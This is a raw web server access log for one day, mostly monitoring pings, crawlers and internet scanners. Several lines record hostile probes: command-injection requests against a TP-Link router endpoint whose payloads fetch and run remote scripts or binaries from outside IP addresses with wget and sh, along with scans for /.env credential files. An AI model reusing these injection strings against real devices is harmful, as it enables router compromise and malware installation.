205.210.31.152 - - [03/Sep/2024:11:42:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:11:42:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:44:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.156.128.43 - - [03/Sep/2024:11:45:56 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.95.49.158 - - [03/Sep/2024:11:46:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:11 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.pship3.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:11:46:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:11:46:59 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.pship3.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:11:46:59 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.148.10.251 - - [03/Sep/2024:11:47:19 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
198.235.24.92 - - [03/Sep/2024:11:48:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:11:48:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:50:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:52:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:54:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:56:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:11:58:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:12:00:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:12:01:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:03:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:05:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:07:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.8.11.202 - - [03/Sep/2024:12:07:31 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
52.70.240.171 - - [03/Sep/2024:12:07:56 +0200] "GET /robots.txt HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
23.22.35.162 - - [03/Sep/2024:12:07:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
45.95.147.211 - - [03/Sep/2024:12:08:14 +0200] "GET /login.asp HTTP/1.1" 404 285 "-" "-"
167.94.146.50 - - [03/Sep/2024:12:08:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
167.94.146.50 - - [03/Sep/2024:12:08:58 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.50 - - [03/Sep/2024:12:08:58 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.50 - - [03/Sep/2024:12:08:58 +0200] "PRI * HTTP/2.0" 400 373 "-" "-"
195.56.55.225 - - [03/Sep/2024:12:09:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
69.171.249.114 - - [03/Sep/2024:12:11:12 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:12:11:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:12:11:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:12:13:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:15:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:17:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:12:17:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
54.193.20.97 - - [03/Sep/2024:12:18:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:12:19:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:21:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.53.45 - - [03/Sep/2024:12:21:54 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:12:23:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:25:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.216.17.87 - - [03/Sep/2024:12:26:56 +0200] "\x16\x03\x01\x02" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:12:27:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:29:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:31:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.83.11.3 - - [03/Sep/2024:12:33:18 +0200] "-" 408 - "-" "-"
91.83.11.3 - - [03/Sep/2024:12:33:18 +0200] "-" 408 - "-" "-"
205.210.31.180 - - [03/Sep/2024:12:33:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:12:33:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:35:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:38:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:40:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.156.68.104 - - [03/Sep/2024:12:41:13 +0200] "GET /.env HTTP/1.1" 404 280 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
94.156.68.104 - - [03/Sep/2024:12:41:57 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34"
195.56.55.225 - - [03/Sep/2024:12:42:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [03/Sep/2024:12:42:20 +0200] "GET /.well-known/acme-challenge/69VI58SAASZEM5KXXP3V3ZCAY3-34HK1 HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:12:42:20 +0200] "GET /.well-known/acme-challenge/Q-YOFPXM70AX1A-BRH175BGZ5CPFE-WG HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:12:42:20 +0200] "GET /.well-known/acme-challenge/KR-Z0ZYA4I3OJIUHEXRXRUUEI6MXMNPC HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:12:42:20 +0200] "GET /.well-known/acme-challenge/4WPY_JC42RRSO2LW81VT8RZT1DVXQYWC HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:12:42:21 +0200] "GET /.well-known/acme-challenge/T1VVP10CSPWZFW1I_K1FD56W6A2KN2NY HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:12:42:21 +0200] "GET /.well-known/acme-challenge/RDIYGET7WVGVXYRUZQICRRY-_QKE5WN3 HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [03/Sep/2024:12:44:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:12:45:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:12:45:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:12:46:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.79 - - [03/Sep/2024:12:46:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.84 - - [03/Sep/2024:12:48:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:12:48:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.255.160.234 - - [03/Sep/2024:12:50:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F89.32.41.95%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:12:50:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:12:52:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:12:52:44 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.84 - - [03/Sep/2024:12:53:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
46.174.191.31 - - [03/Sep/2024:12:54:07 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:12:54:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:12:56:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:12:56:27 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:12:56:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.76.207.254 - - [03/Sep/2024:12:58:25 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.32.2"
195.56.55.225 - - [03/Sep/2024:12:58:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:00:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
47.236.16.186 - - [03/Sep/2024:13:01:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.28.1"
163.172.53.118 - - [03/Sep/2024:13:02:14 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
195.56.55.225 - - [03/Sep/2024:13:02:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:13:03:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:13:03:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
34.79.27.84 - - [03/Sep/2024:13:04:23 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.32.2"
195.56.55.225 - - [03/Sep/2024:13:04:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:06:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
79.124.59.226 - - [03/Sep/2024:13:08:24 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:13:08:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:13:10:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:13:10:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:13:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.58 - - [03/Sep/2024:13:14:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.148.10.251 - - [03/Sep/2024:13:15:02 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:13:15:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
173.252.107.1 - - [03/Sep/2024:13:15:44 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:13:17:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.70 - - [03/Sep/2024:13:18:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [03/Sep/2024:13:18:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:13:19:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:21:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.242.226.10 - - [03/Sep/2024:13:21:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:13:23:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:25:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.242.226.10 - - [03/Sep/2024:13:26:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:13:27:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.8.11.202 - - [03/Sep/2024:13:28:32 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Linux; Android 7.0; ASUS_X00GD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
195.56.55.225 - - [03/Sep/2024:13:29:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.197.82.94 - - [03/Sep/2024:13:29:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:13:31:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:33:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:13:34:51 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.bme.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:13:34:52 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:13:35:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:13:36:11 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:13:36:11 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:13:37:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.134.182 - - [03/Sep/2024:13:39:46 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [03/Sep/2024:13:39:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:13:41:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:13:41:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:13:44:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
155.133.23.58 - - [03/Sep/2024:13:44:31 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
173.252.95.12 - - [03/Sep/2024:13:44:53 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:13:46:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:13:46:35 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:13:48:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [03/Sep/2024:13:48:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
35.232.101.102 - - [03/Sep/2024:13:49:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
35.232.101.102 - - [03/Sep/2024:13:49:54 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "http://attac.zpok.hu/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:13:50:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.241 - - [03/Sep/2024:13:50:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.241 - - [03/Sep/2024:13:50:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.255.160.234 - - [03/Sep/2024:13:50:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F89.32.41.95%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:13:52:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.149.91 - - [03/Sep/2024:13:53:22 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [03/Sep/2024:13:54:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [03/Sep/2024:13:56:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [03/Sep/2024:13:56:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
155.133.23.58 - - [03/Sep/2024:13:57:35 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
27.46.125.34 - - [03/Sep/2024:13:58:24 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.4204.59 Safari/537.36 QIHU 360EE"
195.56.55.225 - - [03/Sep/2024:13:58:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
79.124.59.226 - - [03/Sep/2024:13:59:12 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:14:00:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:02:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:14:02:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
31.13.127.2 - - [03/Sep/2024:14:03:02 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:14:04:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:14:06:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.swartz.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:14:06:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:14:06:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:08:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
